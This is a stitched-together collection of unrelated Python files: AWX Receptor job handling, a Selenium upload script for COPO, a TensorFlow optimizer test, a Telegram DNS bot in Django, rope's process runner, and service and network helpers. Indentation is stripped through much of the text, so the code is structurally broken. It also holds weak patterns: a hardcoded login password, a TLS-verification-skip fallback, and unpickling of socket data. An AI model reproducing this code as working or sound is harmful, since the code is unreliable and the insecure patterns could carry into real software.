# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
                logger.warning(detail)
                log_name = self.task.instance.log_format
                logger.warning(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
            # If ansible-runner ran but an error occurred at runtime, the traceback information
            # is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
    # Spawned in a thread so Receptor can start reading before we finish writing;
    # we write our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
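            # For local (non-K8S) work the private data dir already lives on this node,
            # so only the kwargs need to be streamed to the worker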
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
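        # Build an in-memory kubeconfig so Receptor can authenticate to the container group's
        # cluster with the credential's bearer token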
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
stress_copo_upload.py
|
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading
import os
def _upload():
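    """Drive a Firefox session through the COPO ORCID login flow and a single datafile upload,
    waiting for the file hash to appear before closing the browser."""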
options = Options()
options.headless = False
client = webdriver.Firefox(options=options)
url = "http://demo.copo-project.org/copo"
client.get(url)
login_link = client.find_element_by_class_name("login-button")
login_link.click()
# sign into orcid
username = client.find_element_by_id("userId")
username.send_keys("[email protected]")
    password = client.find_element_by_id("password")
    password.send_keys("Apple123")
login_submit = client.find_element_by_id("form-sign-in-button")
login_submit.click()
# check for authorize
try:
authorize = WebDriverWait(client, 4).until(
EC.presence_of_element_located((By.ID, "authorize"))
)
authorize.click()
    except Exception:
        pass
if "COPO" not in client.title:
return False
client.close()
# go to uploads page
element = client.find_elements_by_partial_link_text("Datafile")
if type(element) is type(list()):
element = element[0]
element.click()
    WebDriverWait(client, 0.5).until(EC.presence_of_element_located((By.LINK_TEXT, "Upload")))
element = client.find_element(By.LINK_TEXT, "Upload")
element.click()
try:
file_upload = WebDriverWait(client, 4).until(
EC.presence_of_element_located((By.NAME, "file"))
)
f = client.find_element_by_name("file")
client.execute_script("$('input[type=\"file\"]').val('/Users/fshaw/Desktop/small1_test.fastq'); $('input[type=\"file\"]').change()")
#f.send_keys("/Users/fshaw/Desktop/small1_test.fastq")
#doc = client.find_element_by_xpath("//html")
#doc.click()
    except Exception as e:
        print(e)
try:
hash = WebDriverWait(client, 3).until(
EC.presence_of_element_located((By.CSS_SELECTOR, ".hash_span"))
)
print("file hashed....exiting")
    except Exception:
print("File not hashed")
finally:
#pass
client.close()
def _test_text():
url = "http://127.0.0.1:8000/copo/test"
options = Options()
options.headless = False
client = webdriver.Firefox(options=options)
client.get(url)
el = client.find_element_by_id("input_text")
el.send_keys("here")
for m in range(0, 1):
    t = threading.Thread(target=_upload)
t.start()
|
sync_replicas_optimizer_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sync_replicas_optimizer.py."""
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import create_local_cluster
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import training
# Creates the workers and returns their sessions, graphs, train_ops.
def get_workers(num_workers, replicas_to_aggregate, workers):
sessions = []
graphs = []
train_ops = []
for worker_id in range(num_workers):
graph = ops.Graph()
is_chief = (worker_id == 0)
with graph.as_default():
with ops.device("/job:ps/task:0"):
global_step = variables.VariableV1(
0, name="global_step", trainable=False)
var_0 = variables.VariableV1(0.0, name="v0")
with ops.device("/job:ps/task:1"):
var_1 = variables.VariableV1(1.0, name="v1")
var_sparse = variables.VariableV1([[3.0], [4.0]], name="v_sparse")
with ops.device("/job:worker/task:" + str(worker_id)):
grads_0 = constant_op.constant(0.1 + worker_id * 0.2)
grads_1 = constant_op.constant(0.9 + worker_id * 0.2)
# This is to test against sparse gradients.
grads_sparse = ops.IndexedSlices(
constant_op.constant(
[0.1 + worker_id * 0.2], shape=[1, 1]),
constant_op.constant([1]),
constant_op.constant([2, 1]))
sgd_opt = gradient_descent.GradientDescentOptimizer(2.0)
sync_rep_opt = training.SyncReplicasOptimizer(
sgd_opt,
replicas_to_aggregate=replicas_to_aggregate,
total_num_replicas=num_workers)
train_op = [
sync_rep_opt.apply_gradients(
zip([grads_0, grads_1, grads_sparse],
[var_0, var_1, var_sparse]),
global_step=global_step)
]
sync_replicas_hook = sync_rep_opt.make_session_run_hook(
is_chief, num_tokens=num_workers)
# Creates MonitoredSession
session = training.MonitoredTrainingSession(
master=workers[worker_id].target,
is_chief=is_chief,
hooks=[sync_replicas_hook])
sessions.append(session)
graphs.append(graph)
train_ops.append(train_op)
return sessions, graphs, train_ops
class SyncReplicasOptimizerTest(test.TestCase):
def _run(self, train_op, sess):
sess.run(train_op)
@test_util.run_v1_only(
"This exercises tensor lookup via names which is not supported in V2.")
def test2Workers(self):
num_workers = 2
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_0 = graphs[0].get_tensor_by_name("v0:0")
var_1_g_0 = graphs[0].get_tensor_by_name("v1:0")
local_step_0 = graphs[0].get_tensor_by_name("sync_rep_local_step:0")
self.assertAllEqual(0.0, sessions[0].run(var_0_g_0))
self.assertAllEqual(1.0, sessions[0].run(var_1_g_0))
self.assertAllEqual(0, sessions[0].run(local_step_0))
# Will just use session 1 to verify all the variables later.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
var_sparse_g_1 = graphs[1].get_tensor_by_name("v_sparse:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initialized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
self.assertAllClose([[3.0], [4.0]], sessions[1].run(var_sparse_g_1))
# We have initial tokens in the queue so we can call this one by one. After
# the first step, this will no longer work as there will be no more extra
# tokens in the queue.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# The global step should have been updated and the variables should now have
# the new values after the average of the gradients are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
self.assertAllClose([[3.0], [4.0 - (0.1 + 0.3) / 2 * 2.0]],
sessions[1].run(var_sparse_g_1))
# The local step for both workers should still be 0 because the initial
# tokens in the token queue are 0s. This means that the following
# computation of the gradients will be wasted as local_step is smaller than
# the current global step. However, this only happens once when the system
# just starts and this is necessary to make the system robust for the case
# when chief gets restarted by errors/preemption/...
self.assertAllEqual(0, sessions[0].run(local_step_0))
self.assertAllEqual(0, sessions[1].run(local_step_1))
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. The variables are still the same.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[0].run(local_step_0))
self.assertAllEqual(1, sessions[1].run(local_step_1))
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
# At this step, the token queue is empty. So the 2 workers need to work
# together to proceed.
threads = []
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0])))
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1])))
    # The two workers start to execute the train op.
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# The global step should now be 2 and the gradients should have been
# applied twice.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(0 - 2 * (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(1 - 2 * (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
# 3 workers and one of them is backup.
@test_util.run_v1_only(
"This exercises tensor lookup via names which is not supported in V2.")
def test3Workers1Backup(self):
num_workers = 3
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initialized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
# We have initial tokens in the queue so we can call this one by one. After
# the token queue becomes empty, they should be called concurrently.
# Here worker 0 and worker 2 finished first.
sessions[0].run(train_ops[0])
sessions[2].run(train_ops[2])
# The global step should have been updated since we only need to collect 2
# gradients. The variables should now have the new values after the average
# of the gradients from worker 0/2 are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllClose(0 - (0.1 + 0.5) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.3) / 2 * 2.0, sessions[1].run(var_1_g_1))
# Worker 1 finished later and its gradients will now be dropped as it is
# stale.
sessions[1].run(train_ops[1])
    # As shown in the previous test, the local_step for all workers should
    # still be 0, so their next computation will also be dropped.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
sessions[2].run(train_ops[2])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. Just check worker 1 as an example.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[1].run(local_step_1))
thread_0 = self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0]))
thread_1 = self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1]))
# Lets worker 0 execute first.
# It will wait as we need 2 workers to finish this step and the global step
# should be still 1.
thread_0.start()
self.assertAllEqual(1, sessions[1].run(global_step))
# Starts worker 1.
thread_1.start()
thread_1.join()
thread_0.join()
# The global step should now be 2 and the gradients should have been
# applied again.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(-0.6 - (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(-1.2 - (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
class SyncReplicasOptimizerHookTest(test.TestCase):
def testErrorIfUsedBeforeMinimizeCalled(self):
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
with self.assertRaisesRegex(ValueError, "apply_gradient should be called"):
hook.begin()
@test_util.run_v1_only(
"train.SyncReplicasOptimizer and train.GradientDescentOptimizer "
"are V1 only APIs.")
def testCanCreatedBeforeMinimizeCalled(self):
"""This behavior is required to be integrated with Estimators."""
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
v = variables.VariableV1([0.])
global_step = variables.VariableV1(0, name="global_step", trainable=False)
opt.minimize(v, global_step=global_step)
hook.begin()
@test_util.run_v1_only(
"train.SyncReplicasOptimizer and train.AdamOptimizer are V1 only APIs.")
def testFetchVariableList(self):
opt = training.SyncReplicasOptimizer(
opt=adam.AdamOptimizer(0.01),
replicas_to_aggregate=1,
total_num_replicas=1)
v = variables.VariableV1([0.], name="fetch_variable_test")
global_step = variables.VariableV1(0, name="global_step", trainable=False)
opt.minimize(v, global_step=global_step)
opt_variables = opt.variables()
beta1_power, beta2_power = opt._opt._get_beta_accumulators()
self.assertIn(beta1_power, opt_variables)
self.assertIn(beta2_power, opt_variables)
if __name__ == "__main__":
test.main()
|
views.py
|
from django.conf import settings
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
import dns.resolver
import json
import requests
import threading
# Create your views here.
def send_message(chat_id, text):
url = 'https://api.telegram.org/bot{}/{}'.format(settings.TELEGRAM_BOT_TOKEN['domain'], 'sendMessage')
print('url: {}'.format(url))
data = {}
data['chat_id'] = chat_id
data['text'] = text
r = requests.post(url, data=data)
def resolve_and_response(chat_id, domain_name):
# Get IP of domain
resolver = dns.resolver.Resolver(configure=False)
resolver.nameservers = ['8.8.8.8']
answer = resolver.query(domain_name, 'A')
domain_ip_list = []
for rr in answer:
domain_ip_list.append(rr.to_text())
res = 'Domain: {}\n'.format(domain_name)
domain_ips = '\n'.join(map(str, domain_ip_list))
res += domain_ips
# Send message back
send_message(chat_id, res)
@csrf_exempt
def index(request):
print('{}'.format(request))
print('{}'.format(request.body))
body = json.loads(request.body)
print('body: {}'.format(body))
print('')
print('')
print('')
print('dumps: {}'.format(json.dumps(body)))
# Get chat ID
chat_id = body['message']['chat']['id']
# Get text content
text = body['message']['text']
# Trim
text = text.strip()
print('cid: {}, text: {}'.format(chat_id, text))
# Command not support
if text[0:3] != '/d ':
print('Command not supported')
        message = '尼在說啥我聽不懂=3=......'  # roughly: "I have no idea what you're saying =3=..."
t = threading.Thread(target = send_message, args=(chat_id, message))
t.start()
return HttpResponse('OK')
# Get domain name
domain_name = text[3:]
# Get IP of domain
t = threading.Thread(target = resolve_and_response, args=(chat_id, domain_name,))
t.start()
return HttpResponse('OK')
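# Illustrative only: the index view above expects a Telegram webhook update of
# roughly this shape (only the fields it actually reads are shown):
#   {"message": {"chat": {"id": 123456789}, "text": "/d example.com"}}
# A "/d <domain>" text triggers resolve_and_response(); any other text gets the
# fallback reply.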
|
doa.py
|
import base64
import hashlib
import hmac
try:
import cPickle as pickle
except ImportError:
import pickle
import marshal
import os
import socket
import subprocess
import sys
import tempfile
import threading
def _compat_compare_digest(a, b):
"""Implementation of hmac.compare_digest for python < 2.7.7.
This function uses an approach designed to prevent timing analysis by
avoiding content-based short circuiting behaviour, making it appropriate
for cryptography.
"""
if len(a) != len(b):
return False
# Computes the bitwise difference of all characters in the two strings
# before returning whether or not they are equal.
difference = 0
for (a_char, b_char) in zip(a, b):
difference |= ord(a_char) ^ ord(b_char)
return difference == 0
try:
from hmac import compare_digest
except ImportError:
compare_digest = _compat_compare_digest
class PythonFileRunner(object):
"""A class for running python project files"""
def __init__(self, pycore, file_, args=None, stdin=None,
stdout=None, analyze_data=None):
self.pycore = pycore
self.file = file_
self.analyze_data = analyze_data
self.observers = []
self.args = args
self.stdin = stdin
self.stdout = stdout
def run(self):
"""Execute the process"""
env = dict(os.environ)
file_path = self.file.real_path
path_folders = self.pycore.project.get_source_folders() + \
self.pycore.project.get_python_path_folders()
env['PYTHONPATH'] = os.pathsep.join(folder.real_path
for folder in path_folders)
runmod_path = self.pycore.project.find_module('rope.base.oi.runmod').real_path
self.receiver = None
self._init_data_receiving()
send_info = '-'
if self.receiver:
send_info = self.receiver.get_send_info()
args = [sys.executable, runmod_path, send_info,
self.pycore.project.address, self.file.real_path]
if self.analyze_data is None:
del args[1:4]
if self.args is not None:
args.extend(self.args)
self.process = subprocess.Popen(
executable=sys.executable, args=args, env=env,
cwd=os.path.split(file_path)[0], stdin=self.stdin,
stdout=self.stdout, stderr=self.stdout, close_fds=os.name != 'nt')
def _init_data_receiving(self):
if self.analyze_data is None:
return
# Disabling FIFO data transfer due to blocking when running
# unittests in the GUI.
# XXX: Handle FIFO data transfer for `rope.ui.testview`
if True or os.name == 'nt':
self.receiver = _SocketReceiver()
else:
self.receiver = _FIFOReceiver()
self.receiving_thread = threading.Thread(
target=self._receive_information)
self.receiving_thread.setDaemon(True)
self.receiving_thread.start()
def _receive_information(self):
#temp = open('/dev/shm/info', 'wb')
for data in self.receiver.receive_data():
self.analyze_data(data)
#temp.write(str(data) + '\n')
#temp.close()
for observer in self.observers:
observer()
def wait_process(self):
"""Wait for the process to finish"""
self.process.wait()
if self.analyze_data:
self.receiving_thread.join()
def kill_process(self):
"""Stop the process"""
if self.process.poll() is not None:
return
try:
if hasattr(self.process, 'terminate'):
self.process.terminate()
elif os.name != 'nt':
os.kill(self.process.pid, 9)
else:
import ctypes
handle = int(self.process._handle)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
except OSError:
pass
def add_finishing_observer(self, observer):
"""Notify this observer when execution finishes"""
self.observers.append(observer)
class _MessageReceiver(object):
def receive_data(self):
pass
def get_send_info(self):
pass
class _SocketReceiver(_MessageReceiver):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.data_port = 3037
self.key = os.urandom(32)
while self.data_port < 4000:
try:
self.server_socket.bind(('localhost', self.data_port))
break
except socket.error:
self.data_port += 1
self.server_socket.listen(1)
def get_send_info(self):
return '%d:%s' % (self.data_port,
base64.b64encode(self.key).decode('utf-8'))
def receive_data(self):
conn, addr = self.server_socket.accept()
self.server_socket.close()
my_file = conn.makefile('rb')
while True:
# Received messages must meet the following criteria:
# 1. Must be contained on a single line.
# 2. Must be prefixed with a base64 encoded sha256 message digest
# of the base64 encoded pickle data.
# 3. Message digest must be computed using the correct key.
#
# Any messages received that do not meet these criteria will never
# be unpickled and will be dropped silently.
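            # Illustrative sketch (not part of the original code): a conforming
            # sender built on the same primitives would emit one line per
            # message, e.g.
            #     payload = base64.b64encode(pickle.dumps(obj))
            #     digest = hmac.new(key, payload, hashlib.sha256).digest()
            #     sock.sendall(base64.b64encode(digest) + b':' + payload + b'\n')
            # where `key` is the base64-decoded key advertised via
            # get_send_info(). Anything else is dropped silently below.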
try:
buf = my_file.readline()
if len(buf) == 0:
break
try:
digest_end = buf.index(b':')
buf_digest = base64.b64decode(buf[:digest_end])
buf_data = buf[digest_end + 1:-1]
decoded_buf_data = base64.b64decode(buf_data)
except:
# Corrupted data; the payload cannot be trusted and just has
# to be dropped. See CVE-2014-3539.
continue
digest = hmac.new(self.key, buf_data, hashlib.sha256).digest()
if not compare_digest(buf_digest, digest):
# Signature mismatch; the payload cannot be trusted and just
# has to be dropped. See CVE-2014-3539.
continue
yield pickle.loads(decoded_buf_data)
except EOFError:
break
my_file.close()
conn.close()
class _FIFOReceiver(_MessageReceiver):
def __init__(self):
# XXX: this is insecure and might cause race conditions
self.file_name = self._get_file_name()
os.mkfifo(self.file_name)
def _get_file_name(self):
prefix = tempfile.gettempdir() + '/__rope_'
i = 0
while os.path.exists(prefix + str(i).rjust(4, '0')):
i += 1
return prefix + str(i).rjust(4, '0')
def get_send_info(self):
return self.file_name
def receive_data(self):
my_file = open(self.file_name, 'rb')
while True:
try:
yield marshal.load(my_file)
except EOFError:
break
my_file.close()
os.remove(self.file_name)
|
network.py
|
import threading
import json
import time
from .socket_handler import SocketHandler
from ..codes import MSG_FIELD
socket_handler = SocketHandler()
def update_node(message, socket):
"""Update a node in the socket handler.
Args:
message (dict): The message containing the ID of the node to be updated.
socket: Socket descriptor of the node to be updated.
"""
try:
worker = socket_handler.get(socket)
worker.update_node_infos(message)
except Exception:
pass
def register_node(message, socket):
"""Register a new node to the socket handler.
Args:
message (dict): The message containing the ID of the node to be registered.
socket: Socket descriptor of the node to be registered.
Returns:
dict or None: Returns a status of success if the node is registered.
"""
try:
time.sleep(1)
node_id = message[MSG_FIELD.NODE_ID]
worker = socket_handler.new_connection(node_id, socket)
t = threading.Thread(target=worker.monitor)
t.start()
return {"status": "success!"}
except Exception:
pass
def forward(message, socket):
"""Forward message to a specific node.
Args:
message (dict): The message which contains the ID of the node to be forwarded to.
socket: Socket descriptor of the node to which the message is forwarded.
"""
try:
time.sleep(1)
dest = message[MSG_FIELD.DESTINATION]
worker = socket_handler.get(dest)
if worker:
content = message[MSG_FIELD.CONTENT]
worker.send(json.dumps(content))
except Exception:
pass
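# Illustrative message shapes handled above (field names come from ..codes.MSG_FIELD):
#   register_node({MSG_FIELD.NODE_ID: "node-1"}, socket)  -> {"status": "success!"}
#   forward({MSG_FIELD.DESTINATION: "node-1", MSG_FIELD.CONTENT: {...}}, socket)
# forwards the content to the registered node's socket as JSON.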
|
main.py
|
"""
This script provides a consistent environment for services to run in. The basic
architecture is:
- parent process (python, ipython, etc.)
- this process, referred to as the "current" process (service/main.py)
- child process (the service)
- (optional): any child processes that the service creates
- clients (any other Python processes that are using this service) - see below
Some services that we spin up do not terminate on their own when their parent
process terminates, so they need to be killed explicitly. However, if the
parent process is a Python interpreter that is in the process of shutting down,
it cannot reliably kill its children. This script works around these issues by
detecting when the parent process exits, terminating its children, and only
then exiting itself.
Some services can also only have a single running instance per user. Notably,
only one instance of MongoDB can use a given data folder. To support this, when
invoked with the "--multi" option, this script allows additional "clients", i.e.
other Python processes using FiftyOne, to register themselves at any time. This
script will continue running in the background and keep the child process alive
until all registered clients, including the original parent process, have
exited.
| Copyright 2017-2022, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
import argparse
import collections
import enum
import os
import signal
import subprocess
import sys
import threading
import traceback
import psutil
os.environ["FIFTYONE_DISABLE_SERVICES"] = "1"
from fiftyone.core.service import Service
from fiftyone.service.ipc import IPCServer
lock = threading.Lock()
# global flag set when either the parent or child has terminated, to trigger
# shutdown of the current process (and children as necessary)
exiting = threading.Event()
class ExitMode(enum.IntEnum):
CHILD = 1
PARENT = 2
# set to indicate whether the child or parent exited first
exit_mode = None
def trigger_exit(mode):
"""Start the shutdown process."""
with lock:
global exit_mode
if exit_mode is None:
exit_mode = ExitMode(mode)
exiting.set()
def start_daemon_thread(target):
thread = threading.Thread(target=target)
thread.daemon = True
thread.start()
return thread
class ChildStreamMonitor(object):
"""Monitor for an output stream (stdout or stderr) of a child process.
This class serves multiple purposes:
- Collects output from the child process in a rolling buffer in the
background, and makes it available in a thread-safe manner.
- Causes the current process to exit when the child process closes the
stream (i.e. when the child process exits).
"""
def __init__(self, stream):
self.stream = stream
self.output_deque = collections.deque(maxlen=4)
thread = threading.Thread(target=self._run_monitor_thread)
thread.start()
def _run_monitor_thread(self):
"""Background task to collect output from the child process.
This is primarily necessary to keep the child process from hanging,
which would occur if it produces too much output that the current
process doesn't read, but the collected output is also made available
for convenience.
"""
while True:
chunk = self.stream.read(1024)
if not chunk:
# EOF - subprocess has exited, so trigger shutdown
trigger_exit(ExitMode.CHILD)
break
self.output_deque.appendleft(chunk)
def to_bytes(self):
"""Return output recently collected from the child process.
Currently, this is limited to the most recent 4KB.
"""
return b"".join(self.output_deque)
class ClientMonitor(object):
"""Monitor to keep track of all clients using this service.
This is only used for services that use multiple clients, e.g. the database
service. In addition to tracking the original parent process, other
processes can also request to be tracked by sending a message to this
process as a tuple: ("register", PID). trigger_exit(PARENT) is only called
after the original parent and all registered clients have shut down.
"""
# sentinel used to represent the original parent (which is tracked without
# its PID)
_PARENT = "parent"
def __init__(self):
"""Creates and starts a client monitor."""
# This has an internal lock, so it is reused for any operations that
# need to be synchronized
self.cond = threading.Condition()
# A set of clients (psutil.Process objects, which are hashable).
# As long as monitor_stdin() hasn't been called yet, we can assume the
# parent is still alive, and this can be changed later
self.clients = {ClientMonitor._PARENT}
# start background tasks
self.thread = start_daemon_thread(target=self._background_loop)
self.server = IPCServer.run_in_background(
on_message=self._handle_message
)
def notify_parent_exit(self):
"""Notifies the monitor that the original parent process has exited."""
self._notify_exit(ClientMonitor._PARENT)
def _background_loop(self):
"""Main background loop - waits for all clients to exit, then shuts down
the current process."""
with self.cond:
while self.clients:
self.cond.wait()
# all clients have exited now, so shut down
trigger_exit(ExitMode.PARENT)
def _background_wait(self, process):
try:
process.wait()
except psutil.Error:
pass
finally:
self._notify_exit(process)
def _notify_exit(self, process):
"""Notifies _background_loop that a client has exited."""
with self.cond:
self.clients.remove(process)
self.cond.notify_all()
def _handle_message(self, message):
"""Handles an incoming IPC message.
This currently supports registering and unregistering clients.
Args:
message (tuple): a 2-item tuple (command: str, argument)
Returns:
response to send to the client (True on success, Exception on failure)
"""
if not isinstance(message, tuple):
raise TypeError("Expected tuple, got " + str(type(message)))
command, arg = message
with lock:
if exiting.is_set():
raise RuntimeError("service is exiting, cannot connect")
if command == "register":
process = psutil.Process(int(arg))
with self.cond:
if process not in self.clients:
self.clients.add(process)
start_daemon_thread(
target=lambda: self._background_wait(process)
)
return True
elif command == "unregister":
process = psutil.Process(int(arg))
self._notify_exit(process)
return True
else:
raise ValueError("Unrecognized command: " + repr(command))
if __name__ != "__main__":
raise RuntimeError(
"This file is for internal use only and cannot be imported"
)
parser = argparse.ArgumentParser()
parser.add_argument(
"--51-service",
dest="service_name",
metavar="SERVICE_NAME",
type=str,
required=True,
)
parser.add_argument("--multi", action="store_true")
args, command = parser.parse_known_args()
if not command:
raise ValueError("No command given")
if command[0].startswith("--"):
raise ValueError("Unhandled service argument: %s" % command[0])
if args.multi:
client_monitor = ClientMonitor()
# ignore signals sent to the parent process - parent process termination is
# handled below, and necessary for cleaning up the child process
if hasattr(os, "setpgrp"):
# UNIX-only: prevent child process from receiving SIGINT/other signals
# from the parent process
os.setpgrp()
